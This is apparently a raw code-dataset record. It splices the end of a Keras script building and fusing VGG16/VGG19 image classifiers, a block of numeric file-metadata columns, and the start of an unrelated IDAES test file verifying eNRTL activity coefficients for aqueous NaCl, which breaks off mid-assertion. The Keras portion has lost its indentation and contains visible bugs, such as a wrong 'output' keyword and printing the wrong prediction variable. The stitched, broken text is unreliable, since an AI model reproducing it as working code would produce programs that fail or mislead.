from keras.utils.data_utils import get_file
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
img_input = Input(shape=(224, 224, 3))
# Block 1
# Block 1
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='16_block1_conv1')(img_input)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='16_block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block1_pool')(x)
# Block 2
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='16_block2_conv1')(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='16_block2_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block2_pool')(x)
# Block 3
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv1')(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv2')(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block3_pool')(x)
# Block 4
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv1')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv2')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block4_pool')(x)
# Block 5
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv1')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv2')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block5_pool')(x)
# Classification block
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu', name='16_fc1')(x)
x = Dense(4096, activation='relu', name='16_fc2')(x)
x = Dense(1000, activation='softmax', name='predictions')(x)
model = Model(inputs=img_input, output=x, name='vgg16')
'load model weights'
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH,
cache_subdir='models')
model.load_weights(weights_path)
return model
@classmethod
def get_vgg19model(cls):
from keras.models import Model
from keras.layers import Flatten
from keras.layers import Dense
from keras.layers import Input
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.utils.data_utils import get_file
from keras import layers
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5'
img_input = Input(shape=(224, 224, 3))
x_vgg19 = Conv2D(64, (3, 3), activation='relu', padding='same', name='19_block1_conv1')(img_input)
x_vgg19 = Conv2D(64, (3, 3), activation='relu', padding='same', name='19_block1_conv2')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block1_pool')(x_vgg19)
# Block 2
x_vgg19 = Conv2D(128, (3, 3), activation='relu', padding='same', name='19_block2_conv1')(x_vgg19)
x_vgg19 = Conv2D(128, (3, 3), activation='relu', padding='same', name='19_block2_conv2')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block2_pool')(x_vgg19)
# Block 3
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv1')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv2')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv3')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block3_pool')(x_vgg19)
# Block 4
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv1')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv2')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv3')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block4_pool')(x_vgg19)
# Block 5
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv1')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv2')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv3')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block5_pool')(x_vgg19)
# classification block
x_vgg19 = Flatten(name='flatten')(x_vgg19)
x_vgg19 = Dense(4096, activation='relu', name='19_fc1')(x_vgg19)
x_vgg19 = Dense(4096, activation='relu', name='19_fc2')(x_vgg19)
x_vgg19 = Dense(1000, activation='softmax', name='19_predictions')(x_vgg19)
model = Model(inputs=img_input, outputs=x_vgg19)
weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH,
cache_subdir='models')
model.load_weights(weights_path)
return model
@classmethod
def util_load_vgg16boostvgg19_weight(cls, vgg16_model, vgg19_model, model):
for layer in model.layers:
try:
if vgg16_model.get_layer(layer.name) != None:
layer.set_weights(vgg16_model.get_layer(layer.name).get_weights())
continue
if vgg19_model.get_layer(layer.name) != None:
layer.set_weights(vgg19_model.get_layer(layer.name).get_weights())
continue
except Exception as e:
print("not find the weight of layer {0} and error is {1}".format(layer.name, e))
pass
pass
class vgg16boostvgg19:
def __init__(self):
from keras.models import Model
from keras.layers import Flatten
from keras.layers import Dense
from keras.layers import Input
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.utils.data_utils import get_file
from keras import layers
WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
img_input = Input(shape=(224, 224, 3))
# Block 1
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='16_block1_conv1')(img_input)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='16_block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block1_pool')(x)
# Block 2
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='16_block2_conv1')(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='16_block2_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block2_pool')(x)
# Block 3
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv1')(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv2')(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='16_block3_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block3_pool')(x)
# Block 4
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv1')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv2')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block4_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block4_pool')(x)
# Block 5
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv1')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv2')(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='16_block5_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='16_block5_pool')(x)
# Classification block
x = Flatten(name='16_flatten')(x)
x = Dense(4096, activation='relu', name='16_fc1')(x)
x = Dense(4096, activation='relu', name='16_fc2')(x)
x = Dense(1000, activation='softmax', name='16_predictions')(x)
# vgg19_input = Input(shape=(224, 224, 3))
# Block 1
x_vgg19 = Conv2D(64, (3, 3), activation='relu', padding='same', name='19_block1_conv1')(img_input)
x_vgg19 = Conv2D(64, (3, 3), activation='relu', padding='same', name='19_block1_conv2')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block1_pool')(x_vgg19)
# Block 2
x_vgg19 = Conv2D(128, (3, 3), activation='relu', padding='same', name='19_block2_conv1')(x_vgg19)
x_vgg19 = Conv2D(128, (3, 3), activation='relu', padding='same', name='19_block2_conv2')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block2_pool')(x_vgg19)
# Block 3
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv1')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv2')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv3')(x_vgg19)
x_vgg19 = Conv2D(256, (3, 3), activation='relu', padding='same', name='19_block3_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block3_pool')(x_vgg19)
# Block 4
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv1')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv2')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv3')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block4_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block4_pool')(x_vgg19)
# Block 5
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv1')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv2')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv3')(x_vgg19)
x_vgg19 = Conv2D(512, (3, 3), activation='relu', padding='same', name='19_block5_conv4')(x_vgg19)
x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2), name='19_block5_pool')(x_vgg19)
#classification block
x_vgg19 = Flatten(name='19_flatten')(x_vgg19)
x_vgg19 = Dense(4096, activation='relu', name='19_fc1')(x_vgg19)
x_vgg19 = Dense(4096, activation='relu', name='19_fc2')(x_vgg19)
x_vgg19 = Dense(1000, activation='softmax', name='19_predictions')(x_vgg19)
output = layers.add([x_vgg19, x])
output = Dense(1000, activation='softmax', name='predictions')(output)
self.model = Model(inputs=img_input, outputs=output)
def plot_model(self):
from keras.utils import plot_model
plot_model(self.model, "vgg16boostvgg19model.png", show_layer_names=True, show_shapes=True)
pass
if __name__ == "__main__":
from keras.preprocessing import image
import numpy as np
from keras.models import Model
from keras.layers import Flatten
from keras.layers import Dense
from keras.layers import Input
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.utils.data_utils import get_file
from keras.preprocessing import image
from keras.applications.imagenet_utils import decode_predictions
from keras.applications.imagenet_utils import preprocess_input
vgg19_model = util_vgg16boostvgg19.get_vgg19model()
vgg16_model = util_vgg16boostvgg19.get_vgg16model()
img_path = 'elephant.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
print('Input image shape:', x.shape)
preds = vgg16_model.predict(x)
print('Predicted:', decode_predictions(preds))
tmp = vgg16boostvgg19()
model = tmp.model
tmp.plot_model()
util_vgg16boostvgg19.util_load_vgg16boostvgg19_weight(vgg16_model, vgg19_model, model)
preds_model = model.predict(x)
print('Predicted:', decode_predictions(preds))
| 49.483986
| 140
| 0.633729
| 1,948
| 13,905
| 4.314682
| 0.078542
| 0.0721
| 0.082808
| 0.11041
| 0.88483
| 0.869245
| 0.843783
| 0.843783
| 0.820821
| 0.807733
| 0
| 0.107543
| 0.209565
| 13,905
| 280
| 141
| 49.660714
| 0.657174
| 0.027976
| 0
| 0.742268
| 0
| 0.020619
| 0.188311
| 0.008158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025773
| false
| 0.015464
| 0.185567
| 0
| 0.231959
| 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1028811116a446d86f3674cadca5dcb53c9dcc2a
| 42,000
|
py
|
Python
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for eNRTL methods
References:
[1] Local Composition Model for Excess Gibbs Energy of Electrolyte Systems, Pt 1.
Chen, C.-C., Britt, H.I., Boston, J.F., Evans, L.B.,
AIChE Journal, 1982, Vol. 28(4), pgs. 588-596
Figures digitized using WebPlotDigitizer, https://apps.automeris.io/wpd/,
May 2021
Author: Andrew Lee
"""
import pytest
from math import exp, log
from pyomo.environ import (ConcreteModel,
Param,
units as pyunits,
value)
from idaes.core import (AqueousPhase,
Solvent,
Apparent,
Anion,
Cation)
from idaes.generic_models.properties.core.eos.enrtl import ENRTL
from idaes.generic_models.properties.core.eos.enrtl_reference_states import \
Unsymmetric
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock, StateIndex)
from idaes.generic_models.properties.core.state_definitions import FTPx
from idaes.generic_models.properties.core.pure.electrolyte import \
relative_permittivity_constant
class ConstantVolMol():
def build_parameters(b):
b.vol_mol_pure = Param(initialize=18e-6,
units=pyunits.m**3/pyunits.mol,
mutable=True)
def return_expression(b, cobj, T):
return cobj.vol_mol_pure
configuration = {
"components": {
"H2O": {"type": Solvent,
"vol_mol_liq_comp": ConstantVolMol,
"relative_permittivity_liq_comp":
relative_permittivity_constant,
"parameter_data": {
"mw": (18E-3, pyunits.kg/pyunits.mol),
"relative_permittivity_liq_comp": 78.54}},
"NaCl": {"type": Apparent,
"dissociation_species": {"Na+": 1, "Cl-": 1},
"vol_mol_liq_comp": ConstantVolMol},
"Na+": {"type": Cation,
"charge": +1},
"Cl-": {"type": Anion,
"charge": -1}},
"phases": {
"Liq": {"type": AqueousPhase,
"equation_of_state": ENRTL}},
"base_units": {"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K},
"state_definition": FTPx,
"state_components": StateIndex.true,
"pressure_ref": 1e5,
"temperature_ref": 300,
"parameter_data": {
"Liq_tau": {
("H2O", "Na+, Cl-"): 8.885, # Table 1, [1]
("Na+, Cl-", "H2O"): -4.549}}} # Table 1, [1]
class TestStateBlockSymmetric(object):
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel()
m.params = GenericParameterBlock(default=configuration)
m.state = m.params.build_state_block([1])
# Need to set a value of T for checking expressions later
m.state[1].temperature.set_value(298.15)
return m
@pytest.mark.unit
def test_parameters(self, model):
assert model.params.Liq.tau["H2O", "Na+, Cl-"].value == 8.885
assert model.params.Liq.tau["Na+, Cl-", "H2O"].value == -4.549
@pytest.mark.unit
def test_log_gamma_h2o(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.0166772823326004: -1.32412227463648,
0.0368235348413794: -1.29987852737794,
0.0569697873501583: -1.2756347801194,
0.0771212007755797: -1.24850091954107,
0.0972755632962254: -1.21971556563714,
0.117432874912095: -1.18927871840762,
0.137590186527965: -1.1588418711781,
0.157748235417641: -1.12799215061718,
0.177912182497766: -1.09383944340507,
0.198075392304084: -1.06009960952436,
0.218237127562791: -1.02718552230644,
0.238402549190528: -0.992207068431534,
0.255813423719564: -0.964639854693858,
0.315405637317823: -0.854261500929733,
0.335560737112275: -0.825063273694407,
0.355727633287624: -0.789259073156702,
0.375898215832003: -0.751390505962001,
0.396062900185934: -0.716824925418492,
0.416232008182701: -0.67978210488659,
0.436393743441407: -0.646868017668675,
0.45655990234295: -0.611476690462368,
0.476725323970687: -0.576498236587459,
0.496889271050811: -0.542345529375349,
0.517057641773772: -0.505715582174845,
0.537221588853897: -0.471562874962733,
0.557387747755439: -0.436171547756426,
0.57755243210937: -0.401605967212917,
0.597715641915689: -0.367866133332205,
0.617878114448201: -0.334539172782892,
0.638036900611684: -0.303276578890572,
0.658196424048972: -0.271601111666854,
0.678351523843423: -0.242402884431529,
0.698502199995039: -0.215681897184597,
0.718656562515684: -0.186896543280671,
0.7388072386673: -0.160175556033739,
0.758950542080854: -0.137583302100794,
0.779093845494409: -0.11499104816785,
0.799235674360352: -0.0932245408977037,
0.820938311873743: -0.0746252682763595,
0.83951122208037: -0.0542331330027968,
0.887081111079702: -0.0241043023855885,
0.907200084457657: -0.0151368683888049,
0.927323481478448: -0.00369219440362834,
0.947432870296923: -0.0000921137150293738,
0.967534886377337: -0.0006207663404183,
0.982152912433448: -0.00191356230614259,
0.999998: 0}
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
model.state[1].Liq_log_gamma["H2O"])
assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
model.state[1].Liq_log_gamma_appr["H2O"])
@pytest.mark.unit
def test_log_gamma_pdh(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.0102202097143692: -0.934567107147103,
0.030381425381713: -0.931468127697603,
0.0505354137471605: -0.932910302939649,
0.0706887450851628: -0.934765310426382,
0.0908453615603908: -0.934556156689684,
0.110996721816058: -0.937649660910475,
0.131153995318731: -0.93702767492909,
0.151309297739069: -0.937644185681764,
0.171467228269187: -0.936609367455696,
0.191622530689525: -0.937225878208369,
0.211781775274533: -0.935365395492927,
0.231939705804651: -0.934330577266858,
0.252104863636666: -0.92875460434924,
0.321728090914091: -0.933511483051937,
0.34189390577355: -0.927522677889634,
0.36205840657812: -0.922359537216703,
0.382220936300354: -0.91843489327783,
0.402379523857917: -0.916987242807075,
0.422542053580151: -0.913062598868203,
0.442695384918153: -0.914917606354935,
0.462852001393382: -0.914708452618238,
0.48301124597839: -0.912847969902795,
0.503172461645734: -0.909748990453295,
0.523331049203297: -0.908301339982539,
0.543494892980421: -0.903551031554295,
0.563651509455649: -0.903341877817597,
0.583805497821097: -0.904784053059643,
0.603966713488441: -0.901685073610144,
0.624131871320455: -0.896109100692527,
0.644295058070134: -0.891771624508968,
0.664454302655143: -0.889911141793526,
0.684614204267596: -0.887637826833398,
0.704786589401507: -0.877520699224235,
0.724946491013961: -0.875247384264106,
0.74511099181853: -0.870084243591175,
0.765274835595655: -0.865333935162931,
0.785453133976572: -0.851501317351594,
0.805626833165373: -0.840558525253058,
0.827641523255411: -0.824211134895509,
0.84781883609516: -0.8109977654512,
0.868006989887754: -0.790972663969571,
0.888198428817574: -0.768883401264512,
0.90840235126885: -0.738950325910417,
0.928616786159249: -0.702411934641345,
0.948852902955337: -0.652250079297633,
0.968231171867699: -0.565426968552611,
0.981271802390295: -0.43102358298104,
0.994543298706282: -0.295478442814278}
# Need to correct for different reference state
OFFSET = 0.971
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g+OFFSET, rel=0.04, abs=0.07) == value(
model.state[1].Liq_log_gamma_pdh["Na+"])
assert pytest.approx(g+OFFSET, rel=0.04, abs=0.07) == value(
model.state[1].Liq_log_gamma_pdh["Cl-"])
@pytest.mark.unit
def test_log_gamma_lc(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.00642910940949107: 2.44391469691802,
0.0261925045768978: 2.42178852215264,
0.046347839144311: 2.42099343992118,
0.0665026808921592: 2.41978548440975,
0.086651608805228: 2.41362304953867,
0.106801522357427: 2.40828636122754,
0.126949464631366: 2.40129817979652,
0.147097406905304: 2.39430999836549,
0.167250277374893: 2.39145054973418,
0.187395262731442: 2.38198512862334,
0.207538276809731: 2.3708682143926,
0.227685726264105: 2.36346715968161,
0.24782331932718: 2.3478086393712,
0.267966826225035: 2.33710459842044,
0.288102940829415: 2.32020745827011,
0.308242505170749: 2.30620043107958,
0.328377141316434: 2.28806467108934,
0.348510299003425: 2.26869029125919,
0.36864394950998: 2.24972878470901,
0.388771193362191: 2.2253999255192,
0.408894987477447: 2.1981809533696,
0.429018781592703: 2.17096198122,
0.449137154692745: 2.13920140299072,
0.469255527792787: 2.10744082476143,
0.489368972697179: 2.07155151373244,
0.509481924782006: 2.03524932942348,
0.52958649893423: 1.99192829935501,
0.549690580266888: 1.94819439600656,
0.569786776486507: 1.89785452017858,
0.589878537330041: 1.84379878483086,
0.609963398699666: 1.78396282356355,
0.630044810332336: 1.72123674933644,
0.650120800949792: 1.65396906902965,
0.670193834649858: 1.58422414904303,
0.690261940154275: 1.5103504962567,
0.710324624643477: 1.4319352373907,
0.730382873756595: 1.34980411900495,
0.750435701854498: 1.26313139453952,
0.770486065854576: 1.17439430367423,
0.790531501659005: 1.08152848000924,
0.807210557418041: 1.01934951372455,
0.832434963627757: 0.879209621277547,
0.851556165620075: 0.779608815922458,
0.869765897827013: 0.683966446828523,
0.88797129322178: 0.584690792870842,
0.906174520210461: 0.483598496481289,
0.9243842524174: 0.387956127387353,
0.943499737702764: 0.283565991984599,
0.962618672725083: 0.182065969541643,
0.98081688527469: 0.0767726875283845,
0.99266736005891: 0.0264587394852946}
# Need to correct for different reference state
OFFSET = 2.414
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g-OFFSET, rel=4e-2, abs=6e-2) == value(
model.state[1].Liq_log_gamma_lc["Na+"])
assert pytest.approx(g-OFFSET, rel=4e-2, abs=6e-2) == value(
model.state[1].Liq_log_gamma_lc["Cl-"])
@pytest.mark.unit
def test_log_gamma(self, model):
# start with pure water
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Data digitized from Fig 6 [1]
data = {0.01620941361168171: 1.4776225827856462,
0.03630284789262042: 1.4722881224536513,
0.05640439199500977: 1.4714951621340302,
0.07650593609739911: 1.4707022018144094,
0.09660453117380643: 1.468257786944834,
0.11669575368525856: 1.4616847357003733,
0.13678697619671068: 1.4551116844559127,
0.1568759869386763: 1.4473000422989863,
0.17697310750209252: 1.4440299001544339,
0.19706727903952678: 1.4391083034599275,
0.21714891721653726: 1.4271680249281156,
0.2372312926500432: 1.415640610033792,
0.2573195661355132: 1.4074161042393771,
0.27739235723457745: 1.3905214620577024,
0.29747473266808344: 1.378994047163379,
0.3175489982801387: 1.3629251322566815,
0.3376203148662119: 1.3452047628000297,
0.3576997412737358: 1.332025893355752,
0.3777658970643405: 1.3114154784366803,
0.3978268920594765: 1.2879150180551888,
0.41788714979811703: 1.2640016940362084,
0.43794077222829786: 1.2363725972798314,
0.4579907083760012: 1.2066791823360115,
0.47803400921524486: 1.1732699946547944,
0.49807952182397497: 1.1410993978860429,
0.5181139755852725: 1.102735846554963,
0.5381454803205878: 1.0627208406739292,
0.5581718242604347: 1.0198157893304751,
0.5781907956353264: 0.9727821016121361,
0.5982009199322718: 0.9207940502439338,
0.618197773612298: 0.8613744534009378,
0.6381975763183062: 0.8036063111078957,
0.6581877946898728: 0.7404709415275024,
0.6781794875744304: 0.678161299222086,
0.6981645451505283: 0.6121358841792732,
0.718139281135689: 0.5403303782116202,
0.7381140171208497: 0.46852487224396766,
0.7580821177975509: 0.39300359353891734,
0.7780472694482699: 0.3158308602839135,
0.7980079975600158: 0.2361809452039778,
0.8209839409036424: 0.13934585427154245,
0.8379095478581289: 0.06573379683191538,
0.8569581176584067: -0.013013060958402267,
0.8772461460653336: -0.10618700754926813,
0.8913177190714701: -0.15982445783107968,
0.9086308771904323: -0.24383529059164832,
0.928588656276196: -0.3251366602215384,
0.9486120511900609: -0.3696931661149465,
0.9686917233497501: -0.3827344143467273,
0.9855967963455463: -0.3541317749389892,
# Error gets too large at this point
# 0.9946128753251389: -0.19481723605693535
}
# Need to correct for different reference state
OFFSET = 1.462
for x, g in data.items():
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
(1-x)/2)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
(1-x)/2)
assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
model.state[1].Liq_log_gamma["Na+"])
assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
model.state[1].Liq_log_gamma["Cl-"])
assert pytest.approx(g-OFFSET, rel=4e-2, abs=2e-2) == value(
model.state[1].Liq_log_gamma_appr["NaCl"])
@pytest.mark.unit
def test_pure_water(self, model):
# Start by setting all mole fractions to small number
# Using 0 results in division by zero errors
for k in model.state[1].mole_frac_phase_comp:
model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
# Test pure water
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1)
# Check mixing expressions
assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(1, rel=1e-8)
assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
1e-12, rel=1e-8)
assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
1e-12, rel=1e-8)
for v in model.state[1].Liq_Y.values():
assert value(v) == pytest.approx(1, rel=1e-8)
for k, v in model.state[1].Liq_alpha.items():
if k == ("H2O", "H2O"):
assert value(v) == 0.3
else:
assert value(v) == 0.2
assert value(model.state[1].Liq_G["H2O", "H2O"]) == 1
assert value(model.state[1].Liq_G["H2O", "Na+"]) == exp(-0.2*8.885)
assert value(model.state[1].Liq_G["Na+", "H2O"]) == exp(-0.2*-4.549)
assert value(model.state[1].Liq_G["H2O", "Cl-"]) == exp(-0.2*8.885)
assert value(model.state[1].Liq_G["Cl-", "H2O"]) == exp(-0.2*-4.549)
assert value(model.state[1].Liq_G["Na+", "Cl-"]) == 1
assert value(model.state[1].Liq_G["Cl-", "Na+"]) == 1
assert value(model.state[1].Liq_tau["H2O", "H2O"]) == 0
assert value(model.state[1].Liq_tau["H2O", "Na+"]) == pytest.approx(
8.885, rel=1e-8)
assert value(model.state[1].Liq_tau["Na+", "H2O"]) == pytest.approx(
-4.549, rel=1e-8)
assert value(model.state[1].Liq_tau["H2O", "Cl-"]) == pytest.approx(
8.885, rel=1e-8)
assert value(model.state[1].Liq_tau["Cl-", "H2O"]) == pytest.approx(
-4.549, rel=1e-8)
assert value(model.state[1].Liq_tau["Na+", "Cl-"]) == 0
assert value(model.state[1].Liq_tau["Cl-", "Na+"]) == 0
# Check activity coefficient contributions
assert (value(model.state[1].Liq_log_gamma_pdh["H2O"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_lc["H2O"]) ==
pytest.approx(0, abs=1e-10))
assert (value(model.state[1].Liq_log_gamma_pdh["H2O"] +
model.state[1].Liq_log_gamma_lc["H2O"]) ==
pytest.approx(0, abs=1e-10))
@pytest.mark.unit
def test_pure_NaCl(self, model):
# Test pure NaCl
model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(1e-12)
model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(0.5)
model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(0.5)
# Check mixing expressions
assert value(model.state[1].Liq_X["H2O"]) == pytest.approx(
1e-12, rel=1e-8)
assert value(model.state[1].Liq_X["Na+"]) == pytest.approx(
0.5, rel=1e-8)
assert value(model.state[1].Liq_X["Cl-"]) == pytest.approx(
